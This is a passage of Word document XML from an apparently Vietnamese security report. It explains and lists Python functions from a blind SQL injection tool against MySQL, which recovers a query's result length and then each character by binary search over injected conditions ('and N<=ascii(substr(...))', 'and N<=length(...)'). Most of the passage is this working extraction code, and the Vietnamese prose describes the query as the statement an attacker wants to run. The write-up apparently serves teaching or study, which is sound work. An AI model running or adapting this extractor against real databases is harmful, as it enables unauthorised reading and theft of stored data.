            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>return True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001F7160" w:rsidRPr="001F7160" w:rsidRDefault="001F7160" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F7160">
              <w:tab/>
              <w:t>return False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00416450" w:rsidRDefault="00835F18" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>() nhận đầu vào là một query (câu lệnh SQL mà kẻ tấn công muốn chạy). Hàm sẽ lần lượt lấy từng ký tự bằng phương pháp tìm kiếm nhị phân. Hàm sẽ kiểm tra giá trị ASCII của ký tự có nhỏ hơn giá trị trung bình cộng của imin (cận dưới) và imax (cận trên). Nếu đúng thì tiếp tục kiểm tra trong trong khoảng dưới, nếu sai sẽ tìm kiếm ở khoảng trên. Sau mỗi yêu cầu, khoảng tìm kiếm thu hẹp được một nửa.</w:t>
      </w:r>
      <w:r w:rsidR="00656FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4DE2" w:rsidRPr="009B4DE2" w:rsidTr="009B4DE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Binary search</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=ascii(substr({1},{2},1))".format(imid,query, (i+1))) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>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r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>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r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.logger.info("Character not found!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(temp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>chr(temp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4DE2" w:rsidRPr="009B4DE2" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006A00C0" w:rsidRDefault="006A00C0" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() tương tự hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(), tuy nhiên cấu trúc được thay đổi để lấy độ dài chuỗi trả về. Về thuật toán giống như hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A00C0" w:rsidRPr="00F96CE5" w:rsidTr="00F96CE5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=length({1})".format(imid,query)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>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t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>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t>if(imin == imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return imin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A00C0" w:rsidRPr="00F96CE5" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return temp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005A6327" w:rsidRDefault="005A6327" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
